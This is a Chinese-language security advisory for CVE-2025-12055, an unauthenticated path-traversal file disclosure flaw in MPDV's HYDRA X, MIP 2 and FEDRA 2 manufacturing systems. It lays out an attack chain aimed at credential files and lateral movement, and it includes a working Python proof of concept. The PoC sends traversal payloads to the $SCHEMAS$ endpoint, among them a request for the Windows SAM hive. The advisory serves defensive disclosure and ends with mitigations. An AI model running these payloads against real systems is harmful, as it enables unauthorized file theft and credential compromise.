CVE-2025-12055: MPDV HYDRA X/MIP 2/FEDRA 2 本地文件泄露漏洞

漏洞信息

漏洞编号

CVE-2025-12055

漏洞类型

本地文件泄露 (LFD)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MPDV Mikrolab GmbH - HYDRA X, MIP 2, FEDRA 2

漏洞概述

CVE-2025-12055是MPDV Mikrolab GmbH公司开发的HYDRA X、MIP 2和FEDRA 2制造执行系统（MES）中的一个高危安全漏洞。该漏洞允许未经认证的远程攻击者通过构造特殊的HTTP请求，读取目标Windows操作系统上的任意文件，包括敏感配置文件、系统凭证、数据库连接信息等。漏洞存在于公开的$SCHEMAS$资源接口中，具体利用点是Filename参数。攻击者无需任何身份认证，也不需要用户交互，即可直接利用此漏洞获取服务器敏感信息，进而可能导致进一步的内网横向移动和数据泄露。由于该漏洞影响所有Maintenance Pack 36及Servicepack 8（2025年第36周）之前的版本，数千家企业可能面临风险。

技术细节

该漏洞为未经认证的本地文件泄露（LFD）漏洞，存在于MPDV MES系统的$SCHEMAS$公开资源接口中。攻击者通过HTTP GET请求，在Filename参数中注入路径遍历序列（如../），结合Windows操作系统的文件路径解析特性，可以访问服务器任意文件。漏洞根源在于应用程序未对用户输入的Filename参数进行充分的路径验证和安全过滤。典型攻击路径：构造形如?Filename=../../../Windows/win.ini或?Filename=../../../boot.ini的请求，服务器将返回相应文件内容。攻击者通常首先读取C:\Windows\win.ini、C:\Windows\System32\drivers\etc\hosts等系统文件以验证漏洞存在，随后读取应用程序配置文件（如web.config、database.yml）获取数据库凭证，或读取SAM SYSTEM等Windows认证文件进行凭证提取。CVSS 3.1向量显示该漏洞通过网络远程利用，无需认证和用户交互即可获取高机密性信息。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标服务器运行MPDV MES系统（HYDRA X/MIP 2/FEDRA 2），确认版本低于Maintenance Pack 36 with Servicepack 8

STEP 2

步骤2: 漏洞探测

向目标服务器的$SCHEMAS$公开接口发送测试请求，通过Filename参数注入路径遍历载荷，验证文件泄露漏洞存在

STEP 3

步骤3: 敏感文件读取

利用漏洞读取系统配置文件如web.config、database.yml、.env等，获取数据库连接凭证、API密钥等敏感信息

STEP 4

步骤4: 凭证提取

尝试读取Windows认证相关文件（如SAM、SYSTEM注册表配置单元）或应用程序认证配置文件

STEP 5

步骤5: 横向移动

利用获取的凭证访问数据库、内部系统或进行进一步的攻击，实现内网横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-12055 PoC - MPDV HYDRA X/MIP 2/FEDRA 2 LFD
# Target: MPDV MES System
# Vulnerability: Unauthenticated Local File Disclosure via $SCHEMAS$ endpoint

target = "http://target-server.com"

def check_vulnerability():
    """Check if target is vulnerable to CVE-2025-12055"""
    
    # Test file paths to read
    test_files = [
        "../../../Windows/win.ini",
        "../../../boot.ini",
        "../../../../Windows/System32/drivers/etc/hosts",
        "../../../Windows/System32/config/SAM"
    ]
    
    for file_path in test_files:
        url = f"{target}/$SCHEMAS$"
        params = {"Filename": file_path}
        
        try:
            response = requests.get(url, params=params, timeout=10, verify=False)
            
            # Check if file content is returned
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] VULNERABLE: {file_path}")
                print(f"[+] Content length: {len(response.content)}")
                print(f"[+] First 500 bytes:\n{response.text[:500]}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {file_path}: {e}")
    
    return False

def exploit(target_file):
    """Exploit CVE-2025-12055 to read arbitrary files"""
    url = f"{target}/$SCHEMAS$"
    params = {"Filename": target_file}
    
    response = requests.get(url, params=params, timeout=10, verify=False)
    
    if response.status_code == 200:
        return response.content
    return None

if __name__ == "__main__":
    print("[*] CVE-2025-12055 PoC")
    print("[*] MPDV HYDRA X/MIP 2/FEDRA 2 LFD")
    check_vulnerability()

影响范围

HYDRA X < Maintenance Pack 36 with Servicepack 8

MIP 2 < Maintenance Pack 36 with Servicepack 8

FEDRA 2 < Maintenance Pack 36 with Servicepack 8

All releases until week 36/2025

防御指南

临时缓解措施

立即在网络层限制对$SCHEMAS$接口的访问，或配置反向代理过滤路径遍历字符序列（../）。同时部署WAF规则拦截包含../的Filename参数请求。建议尽快安排计划性维护窗口，将系统升级至MPDV官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12055
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12055
3 Details https://www.cvedetails.com/cve/CVE-2025-12055/
4 VulDB https://vuldb.com/cve/CVE-2025-12055
5 Link https://r.sec-consult.com/mpdv
6 Link http://seclists.org/fulldisclosure/2025/Oct/28